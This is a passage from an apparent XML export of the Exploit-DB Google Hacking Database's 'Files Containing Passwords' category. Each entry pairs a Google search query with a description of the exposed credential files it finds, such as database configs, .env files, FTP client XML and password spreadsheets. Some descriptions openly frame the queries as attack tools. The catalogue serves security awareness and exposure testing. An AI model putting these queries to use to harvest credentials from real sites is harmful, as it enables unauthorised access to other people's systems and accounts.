<textualDescription># DORK: allintext:&quot;*.@gmail.com&quot; OR &quot;password&quot; OR &quot;username&quot; filetype:xlsx</textualDescription>
<query>allintext:&quot;*.@gmail.com&quot; OR &quot;password&quot; OR &quot;username&quot; filetype:xlsx</query>
<querystring>https://www.google.com/search?q=allintext:&quot;*.@gmail.com&quot; OR &quot;password&quot; OR &quot;username&quot; filetype:xlsx</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Sanem Sudheendra</author>
</entry>
<entry>
<id>6462</id>
<link>https://www.exploit-db.com/ghdb/6462</link>
<category>Files Containing Passwords</category>
<shortDescription>allintext:&quot;redis_password&quot; ext:env</shortDescription>
<textualDescription># Google Dork: allintext:&quot;redis_password&quot; ext:env
# Exposed Redis Passwords found in .env files.
# Date: 05/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allintext:&quot;redis_password&quot; ext:env</query>
<querystring>https://www.google.com/search?q=allintext:&quot;redis_password&quot; ext:env</querystring>
<edb></edb>
<date>2020-08-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6351</id>
<link>https://www.exploit-db.com/ghdb/6351</link>
<category>Files Containing Passwords</category>
<shortDescription>allintext:password filetype:log</shortDescription>
<textualDescription>Dork:allintext:password filetype:log
Description:contains information related to password type website and log
Author:Mohd Asif Khan
</textualDescription>
<query>allintext:password filetype:log</query>
<querystring>https://www.google.com/search?q=allintext:password filetype:log</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Mohd Asif Khan</author>
</entry>
<entry>
<id>7369</id>
<link>https://www.exploit-db.com/ghdb/7369</link>
<category>Files Containing Passwords</category>
<shortDescription>allintext:password filetype:log after:2018</shortDescription>
<textualDescription># Google Dork: allintext:password filetype:log after:2018
# Files Containing Passwords
# Date:26/09/2021
# Exploit Author: AFFAN AHMED</textualDescription>
<query>allintext:password filetype:log after:2018</query>
<querystring>https://www.google.com/search?q=allintext:password filetype:log after:2018</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>161</id>
<link>https://www.exploit-db.com/ghdb/161</link>
<category>Files Containing Passwords</category>
<shortDescription>allinurl: admin mdb</shortDescription>
<textualDescription>Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!</textualDescription>
<query>allinurl: admin mdb</query>
<querystring>https://www.google.com/search?q=allinurl%3A+admin+mdb+</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3821</id>
<link>https://www.exploit-db.com/ghdb/3821</link>
<category>Files Containing Passwords</category>
<shortDescription>allinurl:&quot;User_info/auth_user_file.txt&quot;</shortDescription>
<textualDescription>Google dork for find user info and configuration password of DCForum
allinurl:&quot;User_info/auth_user_file.txt&quot;
- Ajith Kp</textualDescription>
<query>allinurl:&quot;User_info/auth_user_file.txt&quot;</query>
<querystring>https://www.google.com/search?q=allinurl%3A&quot;User_info%2Fauth_user_file.txt&quot;</querystring>
<edb></edb>
<date>2012-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>48</id>
<link>https://www.exploit-db.com/ghdb/48</link>
<category>Files Containing Passwords</category>
<shortDescription>auth_user_file.txt</shortDescription>
<textualDescription>DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)</textualDescription>
<query>allinurl:auth_user_file.txt</query>
<querystring>https://www.google.com/search?q=allinurl%3Aauth_user_file.txt</querystring>
<edb></edb>
<date>2003-07-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4744</id>
<link>https://www.exploit-db.com/ghdb/4744</link>
<category>Files Containing Passwords</category>
<shortDescription>CakePHP inurl:database.php intext:db_password</shortDescription>
<textualDescription>Contains database username and password along with dbname.
Thanks
Kiran S
</textualDescription>
<query>CakePHP inurl:database.php intext:db_password</query>
<querystring>https://www.google.com/search?q=CakePHP inurl:database.php intext:db_password</querystring>
<edb></edb>
<date>2018-04-04</date>
<author>Kiran S</author>
</entry>
<entry>
<id>4784</id>
<link>https://www.exploit-db.com/ghdb/4784</link>
<category>Files Containing Passwords</category>
<shortDescription>Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</shortDescription>
<textualDescription>This dork allow you to specific find file contains Username,
Password, Secret Keys and allows you to search for sql configuration file.
Arya Usha
</textualDescription>
<query>Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</query>
<querystring>https://www.google.com/search?q=Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values</querystring>
<edb></edb>
<date>2018-04-17</date>
<author>Arya Usha</author>
</entry>
<entry>
<id>27</id>
<link>https://www.exploit-db.com/ghdb/27</link>
<category>Files Containing Passwords</category>
<shortDescription>config.php</shortDescription>
<textualDescription>This search brings up sites with &quot;config.php&quot; files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!</textualDescription>
<query>intitle:index.of config.php</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+config%2Ephp</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>180</id>
<link>https://www.exploit-db.com/ghdb/180</link>
<category>Files Containing Passwords</category>
<shortDescription>eggdrop filetype:user user</shortDescription>
<textualDescription>These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.</textualDescription>
<query>eggdrop filetype:user user</query>
<querystring>https://www.google.com/search?q=eggdrop+filetype%3Auser+user</querystring>
<edb></edb>
<date>2004-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1240</id>
<link>https://www.exploit-db.com/ghdb/1240</link>
<category>Files Containing Passwords</category>
<shortDescription>enable password | secret &quot;current configuration&quot; -intext:the</shortDescription>
<textualDescription>Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, &quot;secret 5&quot; and &quot;password 7&quot; passwords.</textualDescription>
<query>enable password | secret &quot;current configuration&quot; -intext:the</query>
<querystring>https://www.google.com/search?q=enable+password+%7C+secret+%22current+configuration%22+-intext%3Athe&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>35</id>
<link>https://www.exploit-db.com/ghdb/35</link>
<category>Files Containing Passwords</category>
<shortDescription>etc (index.of)</shortDescription>
<textualDescription>This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!</textualDescription>
<query>index.of.etc</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3Aindex.of.etc</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>1241</id>
<link>https://www.exploit-db.com/ghdb/1241</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:asa | ext:bak intext:uid intext:pwd -&quot;uid..pwd&quot; database | server | dsn</shortDescription>
<textualDescription>search for plaintext database credentials in ASA and BAK files.</textualDescription>
<query>ext:asa | ext:bak intext:uid intext:pwd -&quot;uid..pwd&quot; database | server | dsn</query>
<querystring>https://www.google.com/search?q=ext:asa+%7C+ext:bak+intext:uid+intext:pwd+-%22uid..pwd%22+database+%7C+server+%7C+dsn&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6600</id>
<link>https://www.exploit-db.com/ghdb/6600</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:cfg &quot;g_password&quot; | &quot;sv_privatepassword&quot; | &quot;rcon_password&quot; -git -gitlab</shortDescription>
<textualDescription># Google Dork: ext:cfg &quot;g_password&quot; | &quot;sv_privatepassword&quot; | &quot;rcon_password&quot; -git -gitlab
# Exposed passwords found in .cfg files.
# Date: 8/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:cfg &quot;g_password&quot; | &quot;sv_privatepassword&quot; | &quot;rcon_password&quot; -git -gitlab</query>
<querystring>https://www.google.com/search?q=ext:cfg &quot;g_password&quot; | &quot;sv_privatepassword&quot; | &quot;rcon_password&quot; -git -gitlab</querystring>
<edb></edb>
<date>2020-10-08</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4648</id>
<link>https://www.exploit-db.com/ghdb/4648</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:config + &quot; password=&quot; + &quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
Huijun Chen
</textualDescription>
<query>ext:config + &quot; password=&quot; + &quot;</query>
<querystring>https://www.google.com/search?q=ext:config + &quot; password=&quot; + &quot;</querystring>
<edb></edb>
<date>2018-01-03</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>4005</id>
<link>https://www.exploit-db.com/ghdb/4005</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:csv intext:&quot;password&quot;</shortDescription>
<textualDescription>This dork finds csv files containing passwords and other juicy information.
Author:NickiK.</textualDescription>
<query>ext:csv intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=ext:csv intext:&quot;password&quot;</querystring>
<edb></edb>
<date>2015-05-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4458</id>
<link>https://www.exploit-db.com/ghdb/4458</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:fetchmailrc</shortDescription>
<textualDescription>Finds .fetchmailrc files with eMail login info
Dxtroyer</textualDescription>
<query>ext:fetchmailrc</query>
<querystring>https://www.google.com/search?q=ext:fetchmailrc</querystring>
<edb></edb>
<date>2017-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1090</id>
<link>https://www.exploit-db.com/ghdb/1090</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:inc &quot;pwd=&quot; &quot;UID=&quot;</shortDescription>
<textualDescription>Database connection strings including passwords</textualDescription>
<query>ext:inc &quot;pwd=&quot; &quot;UID=&quot;</query>
<querystring>https://www.google.com/search?q=ext%3Ainc+%22pwd%3D%22+%22UID%3D%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4641</id>
<link>https://www.exploit-db.com/ghdb/4641</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:inf SetupMgrTag AdminPassword</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
Finds admin password from windows install config files.
Huijun Chen
</textualDescription>
<query>ext:inf SetupMgrTag AdminPassword</query>
<querystring>https://www.google.com/search?q=ext:inf SetupMgrTag AdminPassword</querystring>
<edb></edb>
<date>2017-12-21</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>784</id>
<link>https://www.exploit-db.com/ghdb/784</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:ini eudora.ini</shortDescription>
<textualDescription>Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes.</textualDescription>
<query>ext:ini eudora.ini</query>
<querystring>https://www.google.com/search?q=ext:ini+eudora.ini&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4780</id>
<link>https://www.exploit-db.com/ghdb/4780</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:ini Robust.ini filetype:ini &quot;password&quot;</shortDescription>
<textualDescription>Robust server configuration files containing passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>ext:ini Robust.ini filetype:ini &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=ext:ini Robust.ini filetype:ini &quot;password&quot;</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>840</id>
<link>https://www.exploit-db.com/ghdb/840</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:ini Version=4.0.0.4 password</shortDescription>
<textualDescription>The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide.</textualDescription>
<query>ext:ini Version=4.0.0.4 password</query>
<querystring>https://www.google.com/search?q=ext%3Aini+Version%3D4.0.0.4+password</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6622</id>
<link>https://www.exploit-db.com/ghdb/6622</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:log password END_FILE</shortDescription>
<textualDescription>Dear Team,
# Exploit Title: *ext:log password END_FILE*
# Google Dork: *ext:log password END_FILE*
# Juicy Information : Java password files
# Date: 18/10/2020
# Exploit Author: Sajan Dhakate
Thanks &amp; Regards
Sajan Dhakate
</textualDescription>
<query>ext:log password END_FILE</query>
<querystring>https://www.google.com/search?q=ext:log password END_FILE</querystring>
<edb></edb>
<date>2020-10-19</date>
<author>Sajan Dhakate</author>
</entry>
<entry>
<id>1239</id>
<link>https://www.exploit-db.com/ghdb/1239</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:passwd -intext:the -sample -example</shortDescription>
<textualDescription>Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search.</textualDescription>
<query>ext:passwd -intext:the -sample -example</query>
<querystring>https://www.google.com/search?q=ext:passwd+-intext:the+-sample+-example&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1403</id>
<link>https://www.exploit-db.com/ghdb/1403</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:php intext:&quot;$dbms&quot;&quot;$dbhost&quot;&quot;$dbuser&quot;&quot;$dbpasswd&quot;&quot;$table_prefix&quot;&quot;phpbb_installed&quot;</shortDescription>
<textualDescription>Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature.</textualDescription>
<query>ext:php intext:&quot;$dbms&quot;&quot;$dbhost&quot;&quot;$dbuser&quot;&quot;$dbpasswd&quot;&quot;$table_prefix&quot;&quot;phpbb_installed&quot;</query>
<querystring>https://www.google.com/search?q=ext%3Aphp+intext%3A%22%24dbms%22%22%24dbhost%22%22%24dbuser%22%22%24dbpasswd%22%22%24table_prefix%22%22phpbb_installed%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4503</id>
<link>https://www.exploit-db.com/ghdb/4503</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:reg &quot; [HKEY_CURRENT_USER\Software\ORL\WinVNC3]&quot; -git</shortDescription>
<textualDescription>Finds files with WinVNC passwords
Dxtroyer</textualDescription>
<query>ext:reg &quot; [HKEY_CURRENT_USER\Software\ORL\WinVNC3]&quot; -git</query>
<querystring>https://www.google.com/search?q=ext:reg &quot; [HKEY_CURRENT_USER\Software\ORL\WinVNC3]&quot; -git</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3996</id>
<link>https://www.exploit-db.com/ghdb/3996</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:sql intext:&quot;alter user&quot; intext:&quot;identified by&quot;</shortDescription>
<textualDescription>This dork will show files containing SQL instructions where the
administrator set a password for a database user.
Author: @felmoltor</textualDescription>
<query>ext:sql intext:&quot;alter user&quot; intext:&quot;identified by&quot;</query>
<querystring>https://www.google.com/search?q=ext:sql intext:&quot;alter user&quot; intext:&quot;identified by&quot;</querystring>
<edb></edb>
<date>2015-03-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3901</id>
<link>https://www.exploit-db.com/ghdb/3901</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:sql intext:@gmail.com intext:password</shortDescription>
<textualDescription>author:haji</textualDescription>
<query>ext:sql intext:@gmail.com intext:password</query>
<querystring>https://www.google.com/search?q=ext:sql intext:@gmail.com intext:password</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3839</id>
<link>https://www.exploit-db.com/ghdb/3839</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:sql intext:@hotmail.com intext :password</shortDescription>
<textualDescription>By ,
NItish Mehta ,
Illuminative Works(CEO &amp; Founder )</textualDescription>
<query>ext:sql intext:@hotmail.com intext :password</query>
<querystring>https://www.google.com/search?q=ext:sql intext:@hotmail.com intext :password</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4119</id>
<link>https://www.exploit-db.com/ghdb/4119</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:sql intext:username intext:password</shortDescription>
<textualDescription>search turns up database files with cleartext and encryption, often leading
to open directory structures and configuration files.</textualDescription>
<query>ext:sql intext:username intext:password</query>
<querystring>https://www.google.com/search?q=ext:sql intext:username intext:password</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6558</id>
<link>https://www.exploit-db.com/ghdb/6558</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:txt intext:@yahoo.com intext:password</shortDescription>
<textualDescription> # Google Dork: ext:txt intext:@yahoo.com intext:password
# By using this dorks,It will return the text file that contains some email
and passwords which can be exploited by anyone.
# Date: 22/09/2020
# Author: Dharmveer Singh
</textualDescription>
<query>ext:txt intext:@yahoo.com intext:password</query>
<querystring>https://www.google.com/search?q=ext:txt intext:@yahoo.com intext:password</querystring>
<edb></edb>
<date>2020-09-22</date>
<author>Dharmveer Singh</author>
</entry>
<entry>
<id>899</id>
<link>https://www.exploit-db.com/ghdb/899</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:txt inurl:unattend.txt</shortDescription>
<textualDescription>the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.</textualDescription>
<query>ext:txt inurl:unattend.txt</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=ext%3Atxt+inurl%3Aunattend.txt</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6552</id>
<link>https://www.exploit-db.com/ghdb/6552</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:xls intext:@gmail.com intext:password</shortDescription>
<textualDescription>Dork: ext:xls intext:@gmail.com intext: password
It will return the spreadsheets(xls) that contains some email and passwords
which can be exploited by anyone.
</textualDescription>
<query>ext:xls intext:@gmail.com intext:password</query>
<querystring>https://www.google.com/search?q=ext:xls intext:@gmail.com intext:password</querystring>
<edb></edb>
<date>2020-09-21</date>
<author>malaikarastogi</author>
</entry>
<entry>
<id>4112</id>
<link>https://www.exploit-db.com/ghdb/4112</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD</shortDescription>
<textualDescription>Dork who collects a lot of data in excel file.
By Rootkit Pentester.</textualDescription>
<query>ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD</query>
<querystring>https://www.google.com/search?q=ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD</querystring>
<edb></edb>
<date>2015-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3804</id>
<link>https://www.exploit-db.com/ghdb/3804</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:xml (&quot;mode_passive&quot;|&quot;mode_default&quot;)</shortDescription>
<textualDescription>OffSec:
So the dork is:
ext:xml (&quot;mode_passive&quot;|&quot;mode_default&quot;)
This dork finds Filezilla XML files.<2E> To be more specific;
<EFBFBD><EFBFBD><EFBFBD> recentservers.xml
<EFBFBD><EFBFBD><EFBFBD> sitemanager.xml
<EFBFBD><EFBFBD><EFBFBD> filezilla.xml
These files contain clear text usernames and passwords.<2E> They also contain the hostname or IP to connect to as well as the port.<2E> Most of these results will be for FTP however, you can also get port 22 to SSH in.<2E> This dork of course can be modified to target a specific website by appending site:whateversite.com.<2E> You can also look for a specific username like root by appending &quot;root&quot; to the dork.<2E><>
Regards,
necrodamus
http://www.twitter.com/necrodamus2600
http://www.photobucket.com/profile/necrodamus2600</textualDescription>
<query>ext:xml (&quot;mode_passive&quot;|&quot;mode_default&quot;)</query>
<querystring>https://www.google.com/search?q=ext:xml (&quot;mode_passive&quot;|&quot;mode_default&quot;)</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3831</id>
<link>https://www.exploit-db.com/ghdb/3831</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:xml (&quot;proto='prpl-'&quot; | &quot;prpl-yahoo&quot; | &quot;prpl-silc&quot; | &quot;prpl-icq&quot;)</shortDescription>
<textualDescription>*Google Search:*
https://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22)
*Description:*
Find Accounds and Passwords from Pidgin Users.
Google limit queries to 32 words so it?s impossible to search for all
Account-Types in one query!
List of all Params: Feel free to build your own search query.
proto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour;
prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn;
prpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah;
prpl-irc; prpl-yabber
*Author:* la.usch.io</textualDescription>
<query>ext:xml (&quot;proto='prpl-'&quot; | &quot;prpl-yahoo&quot; | &quot;prpl-silc&quot; | &quot;prpl-icq&quot;)</query>
<querystring>https://www.google.com/search?q=ext:xml (&quot;proto='prpl-'&quot; | &quot;prpl-yahoo&quot; | &quot;prpl-silc&quot; | &quot;prpl-icq&quot;)</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1189</id>
<link>https://www.exploit-db.com/ghdb/1189</link>
<category>Files Containing Passwords</category>
<shortDescription>ext:yml database inurl:config</shortDescription>
<textualDescription>Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text.</textualDescription>
<query>ext:yml database inurl:config</query>
<querystring>https://www.google.com/search?q=ext%3Ayml+database+inurl%3Aconfig</querystring>
<edb></edb>
<date>2005-11-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1236</id>
<link>https://www.exploit-db.com/ghdb/1236</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:bak createobject sa</shortDescription>
<textualDescription>This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters &quot;sa&quot; (default SQL server admin id) and &quot;createobject&quot; which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use &quot;server=127.0.0.1&quot; so you know IIS &amp; SQL Server are running on the same box.</textualDescription>
<query>filetype:bak createobject sa</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=filetype%3Abak+createobject+sa</querystring>
<edb></edb>
<date>2006-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>431</id>
<link>https://www.exploit-db.com/ghdb/431</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:bak inurl:&quot;htaccess|passwd|shadow|htusers&quot;</shortDescription>
<textualDescription>This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.</textualDescription>
<query>filetype:bak inurl:&quot;htaccess|passwd|shadow|htusers&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4446</id>
<link>https://www.exploit-db.com/ghdb/4446</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:bak inurl:php &quot;mysql_connect&quot;</shortDescription>
<textualDescription>PHP backups that contain MySQL database passwords.
filetype:bak inurl:php &quot;mysql_connect&quot;</textualDescription>
<query>filetype:bak inurl:php &quot;mysql_connect&quot;</query>
<querystring>https://www.google.com/search?q=filetype:bak inurl:php &quot;mysql_connect&quot;</querystring>
<edb></edb>
<date>2017-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3786</id>
<link>https://www.exploit-db.com/ghdb/3786</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:cfg &quot;radius&quot; (pass|passwd|password)</shortDescription>
<textualDescription>Find config files with radius configs and passwords and secrets...
Love
Bastich</textualDescription>
<query>filetype:cfg &quot;radius&quot; (pass|passwd|password)</query>
<querystring>https://www.google.com/search?q=filetype:cfg &quot;radius&quot; (pass|passwd|password)</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>265</id>
<link>https://www.exploit-db.com/ghdb/265</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:cfg mrtg &quot;target[*]&quot; -sample -cvs -example</shortDescription>
<textualDescription>Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&amp;1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example.</textualDescription>
<query>filetype:cfg mrtg &quot;target[*]&quot; -sample -cvs -example</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Acfg+mrtg+%22target%5B*%5D%22+-sample+-cvs+-example</querystring>
<edb></edb>
<date>2004-06-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>167</id>
<link>https://www.exploit-db.com/ghdb/167</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:cfm &quot;cfapplication name&quot; password</shortDescription>
<textualDescription>These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.</textualDescription>
<query>filetype:cfm &quot;cfapplication name&quot; password</query>
<querystring>https://www.google.com/search?q=filetype%3Acfm+%22cfapplication+name%22+password</querystring>
<edb></edb>
<date>2004-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>436</id>
<link>https://www.exploit-db.com/ghdb/436</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:conf oekakibbs</shortDescription>
<textualDescription>Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password.</textualDescription>
<query>filetype:conf oekakibbs</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aconf+oekakibbs+</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>240</id>
<link>https://www.exploit-db.com/ghdb/240</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:conf slapd.conf</shortDescription>
<textualDescription>slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff.</textualDescription>
<query>filetype:conf slapd.conf</query>
<querystring>https://www.google.com/search?q=filetype%3Aconf+slapd%2Econf</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4778</id>
<link>https://www.exploit-db.com/ghdb/4778</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:config &quot;&quot; &quot;password&quot; &quot;web.config&quot; -stackoverflow -youtube.com -github</shortDescription>
<textualDescription>Passwords which are stored in the ASP.NET Web.config file which is also
an XML file. This file is mostly used for Authentication, Authorization,
Membership Provider, Role Provider and Profile Provider Settings. Other
juicy info shall be in the file as well.
Bruno Schmid
https://www.linkedin.com/in/schmidbruno
</textualDescription>
<query>filetype:config &quot;&quot; &quot;password&quot; &quot;web.config&quot; -stackoverflow -youtube.com -github</query>
<querystring>https://www.google.com/search?q=filetype:config &quot;&quot; &quot;password&quot; &quot;web.config&quot; -stackoverflow -youtube.com -github</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>495</id>
<link>https://www.exploit-db.com/ghdb/495</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:config config intext:appSettings &quot;User ID&quot;</shortDescription>
<textualDescription>These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public.</textualDescription>
<query>filetype:config config intext:appSettings &quot;User ID&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aconfig+config+intext%3AappSettings+%22User+ID%22</querystring>
<edb></edb>
<date>2004-09-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3834</id>
<link>https://www.exploit-db.com/ghdb/3834</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:config inurl:web.config inurl:ftp</shortDescription>
<textualDescription>This google dork to find sensitive information of MySqlServer , &quot;uid, and
password&quot; in web.config through ftp..
filetype:config inurl:web.config inurl:ftp
-Altamimi</textualDescription>
<query>filetype:config inurl:web.config inurl:ftp</query>
<querystring>https://www.google.com/search?q=filetype:config inurl:web.config inurl:ftp</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>238</id>
<link>https://www.exploit-db.com/ghdb/238</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:dat &quot;password.dat&quot;</shortDescription>
<textualDescription>This file contains plaintext usernames and password. Deadly information in the hands of an attacker.</textualDescription>
<query>filetype:dat &quot;password.dat&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Adat+%22password.dat%22</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>1111</id>
<link>https://www.exploit-db.com/ghdb/1111</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:dat inurl:Sites.dat</shortDescription>
